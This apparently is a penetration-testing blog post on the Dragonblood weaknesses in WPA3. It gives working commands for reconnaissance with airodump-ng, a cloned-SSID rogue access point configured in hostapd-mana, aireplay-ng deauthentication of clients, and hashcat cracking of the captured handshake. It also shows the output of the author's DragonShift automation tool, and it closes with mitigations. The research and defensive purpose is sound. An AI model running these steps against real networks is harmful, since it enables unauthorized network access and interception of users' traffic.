Introduction
The Dragonblood vulnerability has revealed several significant weaknesses in WPA3, the latest Wi-Fi security protocol. WPA3 was designed to provide improved security over its predecessor, WPA2, by using a new handshake method called
Key Attacks on WPA3
Downgrade & Dictionary Attack Against WPA3-Transition
The WPA3 protocol includes a transition mode to support older WPA2 clients. However, this feature can be exploited in a downgrade attack. Here’s how it works :
Rogue Network Creation
An attacker sets up a rogue Wi-Fi network that only supports WPA2.Client Downgrade
WPA3-capable devices can be tricked into connecting to this WPA2-only network.Password Recovery
The attacker captures the handshake from the WPA2 connection, which can be used to recover the network password through brute-force or dictionary attacks.
This attack highlights a significant flaw in WPA3’s backward compatibility, as it allows WPA3 networks to be vulnerable if older WPA2 support is present.
Security Group Downgrade Attack
In WPA3’s Dragonfly handshake, an attacker can force a client to use a weak security group. The attacker impersonates the access point and sends forged decline messages, causing the client to repeatedly lower its security group until a weak one is accepted by both sides. Here’s how:
Impersonation
The attacker masquerades as an AP and sends fake decline messages.Forced Downgrade
The client is forced to use a less secure security group that the attacker can exploit.
This attack reduces the overall security of the WPA3 network by making clients fall back to weaker cryptographic protections.
Timing-Based Side-Channel Attack
Timing-based attacks exploit variations in response times to infer information about the password. Specifically :
Response Timing
Differences in how long an AP takes to respond to commit frames can leak information about the password when using certain elliptic curves.Dictionary Attack
By measuring response times, an attacker can perform a dictionary attack to guess the password.
This attack is particularly effective when the AP uses Brainpool curves or MODP groups, revealing sensitive timing information that can be used to crack passwords.
Cache-Based Side-Channel Attack
This attack involves observing memory access patterns during the Dragonfly handshake:
Memory Patterns
Attackers can analyze memory access patterns to infer the password used in the handshake.Implementation Exposure
This attack is possible if the attacker controls applications on the victim’s device or injects JavaScript into the victim’s browser.
This flaw exposes sensitive information through observable patterns, leading to potential password recovery.
Denial-of-Service Attack
A denial-of-service (DoS) attack can overload an AP :
Commit Frames
An attacker sends numerous forged commit frames to exhaust the AP’s resources.Impact
This can lead to high CPU usage, battery drain, and connectivity issues for legitimate users.
The attack exploits the computational expense of processing commit frames and can significantly disrupt network operations.
In-Depth Look : Downgrade & Dictionary Attack Against WPA3-Transition
The downgrade and dictionary attack against WPA3’s transition mode reveals a serious vulnerability in WPA3’s approach to backward compatibility.
Manual exploitation
The downgrade and dictionary attack against WPA3’s transition mode is a sophisticated method that leverages the coexistence of WPA2 and WPA3 in a Access Point. Here’s how the attack unfolds step by step, but before that, in order to exploit this attack, we will need the following tools:
Wireshark hostapd-mana Aircrack-ng suite :- airodump-ng
- airmon-ng
The primary goal is to provide both a theoretical and practical explanation of the attack across five distinct phases. We’ll explore how to identify vulnerable WPA3 access points, set up a rogue access point to lure legitimate stations away from the genuine access point, and leverage the transition mode to capture the handshake, which can then be cracked offline.
The first step in this attack is to identify a target Wi-Fi network that supports both WPA2-PSK (Pre-Shared Key) and WPA3-SAE (Simultaneous Authentication of Equals). This dual support is necessary for the attack to be possible. By using tools like Airodump-ng and Wireshark, an attacker can capture packets from the airwaves and observe the network’s authentication mechanisms.
# Starting monitor mode on wlan0
sudo airmon-ng start wlan0
# Starting packet capture during 1 minute
sudo airodump-ng wlan0mon -w discovery --output-format pcap --manufacturer --wps --band abg
Discovery WPA3 SAE via Airodump
# Launching Wireshark on the generated pcap file
sudo wireshark discovery-01.cap
Wireshark capture - Transition mode enabled
In the packet captures, it becomes evident if the access point (AP) is configured to accept both WPA2-PSK and WPA3-SAE. This is crucial because the transition mode in WPA3 allows devices that are not WPA3-compatible to still connect using WPA2, which opens the door to exploitation.
Here are the key pieces of information gathered from Airodump-ng and the Wireshark analysis to determine if an AP is vulnerable :
SSIDBSSIDChannelTransition Mode Enabled
With this information, we can now proceed to create our rogue access point.
Once the target AP is identified, the attacker sets up a rogue AP thanks to
# Creating the config file according to the Wireshark analysis
# ------------------------------------------------------------
sudo cat wpa3.conf
# Interface where the Rogue AP will communicate
interface=wlan1
# Enabling 802.11
driver=nl80211
# G Band, careful if the channel is on another band
hw_mode=g
# Rogue AP Channel - same as the legitimate one
channel=11
# Rogue AP SSID - same as the legitimate one
ssid=wifi-IT
# handshake out file
mana_wpaout=wifi-IT-handshake.hccapx
# Client can only connect using WPA2
wpa=2
# Setting authentication to WPA-PSK
wpa_key_mgmt=WPA-PSK
# Setting pairwise to TKIP CCMP
wpa_pairwise=TKIP CCMP
# Doesn't matter
wpa_passphrase=12345678
# Launching hostapd-mana on the config file
sudo hostapd-mana wpa3.conf
Launching the Rogue AP
Info
It’s important to mention that I’m using two different interfaces : one in monitor mode (wlan0mon) and another for running my rogue access point (wlan1).
While it’s possible to execute the attack using just a single interface, it’s crucial to note that if you do so, once the rogue AP is active, you won’t be able to perform the deauthentication attack to force a station to connect to the rogue AP.
This is because the only available interface would already be in use by hostapd-mana for the rogue AP.
It’s for this reason that it is
To trick a victim into connecting to the rogue AP, the attacker uses a deauthentication attack. This involves sending deauthentication frames to the target device, which causes it to disconnect from the legitimate AP. Since the victim’s device is configured to reconnect automatically to the strongest available signal, it will then attempt to reconnect. Because the rogue AP has the same SSID and channel as the legitimate one and may be closer or have a stronger signal due to its proximity, the victim’s device is likely to connect to the rogue AP, believing it is the legitimate network.
# Enumerating stations on our wifi-IT vulnerable AP
sudo airodump-ng wlan0mon --bssid F0:9F:C2:1A:CA:25 --channel 11
Connected stations
In the figure showing the connected stations, we observe that three stations are currently linked to the legitimate access point with the BSSID F0:9F:C2:1A:CA:2510:F9:6F:AC:53:52
# Deauthenticating 5x a station that is connected on the vulnerable AP
sudo aireplay-ng wlan0mon -0 5 -a F0:9F:C2:1A:CA:25 -c 10:F9:6F:AC:53:52
Successful deauthentication and handshake capture
Once the victim connects to the rogue AP using WPA2-PSK, the attacker captures the WPA2 four-way handshake. This handshake is a crucial element of the WPA2 authentication process and contains enough information to allow the attacker to perform an offline brute-force or dictionary attack to recover the network password. Capturing this handshake is straightforward for the attacker, as it is transmitted openly between the client and the rogue AP during the connection process.
During step 3, this handshake was automatically captured when the station tried to connect on our rogue AP and saved in hccapx
Hccapx file containing the handshake
With the WPA2 handshake in hand, the attacker can then proceed to crack it offline. This process involves using brute-force or dictionary attacks to guess the correct password. The attacker tries different passwords until the correct one is found, allowing them to recover the network’s password. Since WPA2 handshakes are susceptible to offline cracking, this step is often successful, especially if the password is weak or commonly used.
# Cracking the PSK with Hashcat
sudo hashcat -a 0 -m 2500 wifi-IT-handshake.hccapx ~/rockyou-top100000.txt --force
Cracking the PSK
DragonShift : Automating the process
In order to be able to automatically exploit all of the above steps, I have developed a tool called
python3 dragonshift.py --help
▓█████▄ ██▀███ ▄▄▄ ▄████ ▒█████ ███▄ █ ██████ ██░ ██ ██▓ █████▒▄▄▄█████▓
▒██▀ ██▌▓██ ▒ ██▒▒████▄ ██▒ ▀█▒▒██▒ ██▒ ██ ▀█ █ ▒██ ▒ ▓██░ ██▒▓██▒▓██ ▒ ▓ ██▒ ▓▒
░██ █▌▓██ ░▄█ ▒▒██ ▀█▄ ▒██░▄▄▄░▒██░ ██▒▓██ ▀█ ██▒░ ▓██▄ ▒██▀▀██░▒██▒▒████ ░ ▒ ▓██░ ▒░
░▓█▄ ▌▒██▀▀█▄ ░██▄▄▄▄██ ░▓█ ██▓▒██ ██░▓██▒ ▐▌██▒ ▒ ██▒░▓█ ░██ ░██░░▓█▒ ░ ░ ▓██▓ ░
░▒████▓ ░██▓ ▒██▒ ▓█ ▓██▒░▒▓███▀▒░ ████▓▒░▒██░ ▓██░▒██████▒▒░▓█▒░██▓░██░░▒█░ ▒██▒ ░
▒▒▓ ▒ ░ ▒▓ ░▒▓░ ▒▒ ▓▒█░ ░▒ ▒ ░ ▒░▒░▒░ ░ ▒░ ▒ ▒ ▒ ▒▓▒ ▒ ░ ▒ ░░▒░▒░▓ ▒ ░ ▒ ░░
░ ▒ ▒ ░▒ ░ ▒░ ▒ ▒▒ ░ ░ ░ ░ ▒ ▒░ ░ ░░ ░ ▒░░ ░▒ ░ ░ ▒ ░▒░ ░ ▒ ░ ░ ░
░ ░ ░ ░░ ░ ░ ▒ ░ ░ ░ ░ ░ ░ ▒ ░ ░ ░ ░ ░ ░ ░ ░░ ░ ▒ ░ ░ ░ ░
░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░
░
DragonShift v1 - WPA3-Transition Downgrade Attack Tool
Copyright (c) 2024, Akerva, CHAABT Moussa
usage: dragonshift.py [-h] -m MONITOR_INTERFACE [-r ROGUEAP_INTERFACE]
Automated WPA3-Transition Downgrade Attack Tool (Dragonblood).
options:
-h, --help show this help message and exit
-m MONITOR_INTERFACE, --monitor MONITOR_INTERFACE
Interface to use in monitor mode.
-r ROGUEAP_INTERFACE, --rogue ROGUEAP_INTERFACE
Interface to use for Rogue AP during hostapd-mana launch.
Info
If the script is launched with a single interface (in monitor mode), it will operate in passive mode, waiting for clients to connect to the rogue AP to intercept the handshake. However, if the script is launched with two interfaces (one in monitor mode and the other in managed mode), the user can initiate deauthentication attacks from a second terminal when prompted by the script, thereby speeding up the handshake capture process.
Below is an example demonstrating the use of two interfaces, wlan0mon in monitor mode (the network card on my laptop) and wlan1 in managed mode (an external Alpha Wi-Fi network card).
root@WiFiChallengeLab:~/wifi/script# python3 dragon.py -m wlan0mon -r wlan1
▓█████▄ ██▀███ ▄▄▄ ▄████ ▒█████ ███▄ █ ██████ ██░ ██ ██▓ █████▒▄▄▄█████▓
▒██▀ ██▌▓██ ▒ ██▒▒████▄ ██▒ ▀█▒▒██▒ ██▒ ██ ▀█ █ ▒██ ▒ ▓██░ ██▒▓██▒▓██ ▒ ▓ ██▒ ▓▒
░██ █▌▓██ ░▄█ ▒▒██ ▀█▄ ▒██░▄▄▄░▒██░ ██▒▓██ ▀█ ██▒░ ▓██▄ ▒██▀▀██░▒██▒▒████ ░ ▒ ▓██░ ▒░
░▓█▄ ▌▒██▀▀█▄ ░██▄▄▄▄██ ░▓█ ██▓▒██ ██░▓██▒ ▐▌██▒ ▒ ██▒░▓█ ░██ ░██░░▓█▒ ░ ░ ▓██▓ ░
░▒████▓ ░██▓ ▒██▒ ▓█ ▓██▒░▒▓███▀▒░ ████▓▒░▒██░ ▓██░▒██████▒▒░▓█▒░██▓░██░░▒█░ ▒██▒ ░
▒▒▓ ▒ ░ ▒▓ ░▒▓░ ▒▒ ▓▒█░ ░▒ ▒ ░ ▒░▒░▒░ ░ ▒░ ▒ ▒ ▒ ▒▓▒ ▒ ░ ▒ ░░▒░▒░▓ ▒ ░ ▒ ░░
░ ▒ ▒ ░▒ ░ ▒░ ▒ ▒▒ ░ ░ ░ ░ ▒ ▒░ ░ ░░ ░ ▒░░ ░▒ ░ ░ ▒ ░▒░ ░ ▒ ░ ░ ░
░ ░ ░ ░░ ░ ░ ▒ ░ ░ ░ ░ ░ ░ ▒ ░ ░ ░ ░ ░ ░ ░ ░░ ░ ▒ ░ ░ ░ ░
░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░
░
DragonShift v1 - WPA3-Transition Downgrade Attack Tool
Copyright (c) 2024, Akerva, CHAABT Moussa
[+] All required tools are present.
[+] The wlan0mon interface is in monitor mode. Starting Airodump-ng.
[+] Airodump-ng is running on interface wlan0mon for 1 minute...
[+] Capture done. Files are saved under 'scan-2024-08-24-18-57/discovery'.
[+] Parsing PCAP file: scan-2024-08-24-18-57/discovery-01.cap
[AP VULNERABLE TO DRAGONBLOOD] :
- SSID: wifi-IT
- BSSID: f0:9f:c2:1a:ca:25
- Channel: 11
- Security Protocol: WPA3
- Cipher: CCMP
- Authentication: PSK, SAE
- MFP: Inactive
[AP VULNERABLE TO DRAGONBLOOD] :
- SSID: wifi-VULN
- BSSID: f0:9f:c2:1a:ca:80
- Channel: 10
- Security Protocol: WPA3
- Cipher: CCMP
- Authentication: PSK, SAE
- MFP: Inactive
[+] Starting airodump-ng on wifi-IT (f0:9f:c2:1a:ca:25) with channel 11 for 30 seconds...
[+] Capture done for wifi-IT. CSV files are saved under : scan-2024-08-24-18-57/wifi-IT-station.csv
[+] Connected stations on wifi-IT:
- Station MAC: 10:F9:6F:AC:53:52
- Station MAC: A2:F0:D4:D9:0D:97
- Station MAC: 10:F9:6F:AC:53:53
[+] Starting airodump-ng on wifi-VULN (f0:9f:c2:1a:ca:80) with channel 10 for 30 seconds...
[+] Capture done for wifi-VULN. CSV files are saved under : scan-2024-08-24-18-57/wifi-VULN-station.csv
[+] Connected stations on wifi-VULN:
- Station MAC: 02:00:00:00:05:00
[+] Hostapd configuration file created: /root/wifi/script/scan-2024-08-24-18-57/wifi-IT-sae.conf
[+] Hostapd configuration file created: /root/wifi/script/scan-2024-08-24-18-57/wifi-VULN-sae.conf
[!] Stations are connected. Would you like to start the attack? (y/n) y
[+] Starting Rogue AP with hostapd-mana...
[+] Open a new terminal and run a deauth attack against the vulnerable AP and the connected client
[!] For deauth attack, you can use aireplay-ng like this : aireplay-ng <MONITOR INTERFACE> -0 5 -a <AP BSSID> -c <STATION MAC>
Configuration file: /root/wifi/script/scan-2024-08-24-18-57/wifi-IT-sae.conf
MANA: Captured WPA/2 handshakes will be written to file '/root/wifi/script/scan-2024-08-24-18-57/wifi-IT-handshake.hccapx'.
Using interface wlan1 with hwaddr 42:00:00:00:01:00 and ssid "wifi-IT"
wlan1: interface state UNINITIALIZED->ENABLED
wlan1: AP-ENABLED
wlan1: STA 10:f9:6f:ac:53:52 IEEE 802.11: authenticated
wlan1: STA 10:f9:6f:ac:53:52 IEEE 802.11: associated (aid 1)
MANA: Captured a WPA/2 handshake from: 10:f9:6f:ac:53:52
[+] Handshake captured ! Shutting down Rogue AP (hostapd-mana).
[+] Run hashcat using mode 2500 to crack the handshake
[!] Example command : hashcat -a 0 -m 2500 <SSID>-handshake.hccapx <WORDLIST PATH> --force
[+] Starting Rogue AP with hostapd-mana...
[+] Open a new terminal and run a deauth attack against the vulnerable AP and the connected client
[!] For deauth attack, you can use aireplay-ng like this : aireplay-ng <MONITOR INTERFACE> -0 5 -a <AP BSSID> -c <STATION MAC>
Configuration file: /root/wifi/script/scan-2024-08-24-18-57/wifi-VULN-sae.conf
MANA: Captured WPA/2 handshakes will be written to file '/root/wifi/script/scan-2024-08-24-18-57/wifi-VULN-handshake.hccapx'.
Using interface wlan1 with hwaddr 42:00:00:00:01:00 and ssid "wifi-VULN"
wlan1: interface state UNINITIALIZED->ENABLED
wlan1: AP-ENABLED
wlan1: STA 02:00:00:00:05:00 IEEE 802.11: authenticated
wlan1: STA 02:00:00:00:05:00 IEEE 802.11: associated (aid 1)
MANA: Captured a WPA/2 handshake from: 02:00:00:00:05:00
[+] Handshake captured ! Shutting down Rogue AP (hostapd-mana).
[+] Run hashcat using mode 2500 to crack the handshake
[!] Example command : hashcat -a 0 -m 2500 <SSID>-handshake.hccapx <WORDLIST PATH> --force
We can see that the script has successfully identified two vulnerable APs (wifi-IT and wifi-VULN) and automates all the tasks necessary to prepare the attack. Once the script is ready, it notifies the user with the message: “Starting Rogue AP with hostapd-mana” indicating that the user can now begin sending deauthentication packets from a second terminal to the clients discovered during the scan. Once the user starts this process, the handshake will be automatically captured and stored and the script will proceeds to the next vulnerable access point.
Impact and Implications
One of the most immediate impacts of this attack is the potential for compromising the security of a wireless network. By exploiting the transition mode, an attacker can force devices that should be using the more secure WPA3-SAE protocol to revert to WPA2-PSK. Since WPA2 is known to have vulnerabilities, particularly to offline dictionary attacks, the attacker can then easily capture and crack the WPA2 handshake. Once the attacker obtains the network’s password, they gain unauthorized access to the network, allowing them to intercept data, launch further attacks, or even access sensitive information shared on the network. This completely defeats the purpose of upgrading to WPA3.
Mitigation Efforts
One of the most effective ways to mitigate the risk of downgrade attacks is to disable WPA3 transition mode entirely. By doing this, the network forces all devices to connect using WPA3-SAE, thus eliminating the possibility of falling back to the less secure WPA2-PSK. While this solution enhances security, it does come with the trade-off of potentially excluding older devices that do not support WPA3 from the network. However, for environments where security is a top priority, this approach is often justified. Network administrators should weigh the risks and benefits carefully and may need to phase out older devices that cannot meet the new security standards.
If disabling WPA3 transition mode is not feasible due to the need to support older devices, it is crucial to ensure that the WPA2 configuration is as strong as possible. This includes using a complex, unique password for the WPA2 network to make it more resistant to offline dictionary attacks. Additionally, deploying enterprise-level security features such as WPA2-Enterprise, which uses individual authentication credentials for each user rather than a shared password, can provide an additional layer of protection. While this does not entirely eliminate the risk, it significantly raises the bar for attackers.
Another important mitigation strategy is the implementation of rogue access point detection systems. These systems can monitor the network for unauthorized access points, which are often used in downgrade attacks. By identifying and alerting administrators to the presence of rogue APs, these systems can help prevent users from connecting to malicious networks. In environments where security is critical, such as corporate or government networks, rogue AP detection should be a standard part of the network security infrastructure.
Conclusion
The Dragonblood vulnerabilities have highlighted several critical weaknesses in WPA3 and the EAP-pwd protocol, particularly around the Dragonfly handshake. While WPA3 was intended to enhance security over WPA2, these attacks reveal that its implementation can still be vulnerable, especially when dealing with backward compatibility and side-channel attacks. Network administrators and device manufacturers must stay informed about these vulnerabilities and apply updates and mitigations to protect against these risks.